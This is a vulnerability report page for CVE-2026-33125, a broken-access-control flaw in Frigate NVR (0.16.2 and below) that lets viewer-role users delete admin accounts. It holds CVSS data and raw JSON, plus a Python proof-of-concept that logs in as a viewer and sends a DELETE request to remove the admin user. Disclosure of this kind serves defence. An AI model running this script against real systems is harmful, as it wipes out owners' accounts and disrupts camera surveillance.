Security Vulnerability Report
中文
CVE-2026-33125 CVSS 7.1 HIGH

CVE-2026-33125

Published: 2026-03-20 10:16:19
Last Modified: 2026-03-20 20:01:43

Description

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In versions 0.16.2 and below, users with the viewer role can delete admin and low-privileged user accounts. Exploitation can lead to DoS and affect data integrity. This issue has been patched in version 0.16.3.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:* - VULNERABLE
Frigate <= 0.16.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_host = "http://192.168.1.100:5000" viewer_user = "viewer" viewer_pass = "password" admin_user_id = "1" # The ID of the admin account to delete def exploit(): session = requests.Session() # Step 1: Authenticate as a low-privileged viewer user print("[*] Attempting to login as viewer...") login_data = { "username": viewer_user, "password": viewer_pass } try: # Assuming standard login endpoint login_resp = session.post(f"{target_host}/api/token", data=login_data) if login_resp.status_code != 200: print("[-] Login failed.") return print("[+] Login successful.") # Step 2: Exploit Broken Access Control to delete Admin print(f"[*] Attempting to delete user ID {admin_user_id}...") # The vulnerability allows the viewer role to access the deletion endpoint delete_url = f"{target_host}/api/users/{admin_user_id}" delete_resp = session.delete(delete_url) if delete_resp.status_code in [200, 204]: print(f"[+] Successfully deleted user ID {admin_user_id}. Admin account removed.") else: print(f"[-] Exploit failed. Server responded with: {delete_resp.status_code}") print(delete_resp.text) except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33125", "sourceIdentifier": "[email protected]", "published": "2026-03-20T10:16:19.013", "lastModified": "2026-03-20T20:01:42.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In versions 0.16.2 and below, users with the viewer role can delete admin and low-privileged user accounts. Exploitation can lead to DoS and affect data integrity. This issue has been patched in version 0.16.3."}, {"lang": "es", "value": "Frigate es un grabador de vídeo en red (NVR) con detección de objetos local en tiempo real para cámaras IP. En las versiones 0.16.2 e inferiores, los usuarios con el rol de espectador pueden eliminar cuentas de administrador y de usuario con pocos privilegios. La explotación puede conducir a DoS y afectar la integridad de los datos. Este problema ha sido parcheado en la versión 0.16.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.16.3", "matchCriteriaId": "4B744C6E-3CD3-4E1B-86E8-4159D6364293"}]}]}], "references": [{"url": "https://github.com/blakeblackshear/frigate/releases/tag/v0.16.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-vg28-83rp-8xx4", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}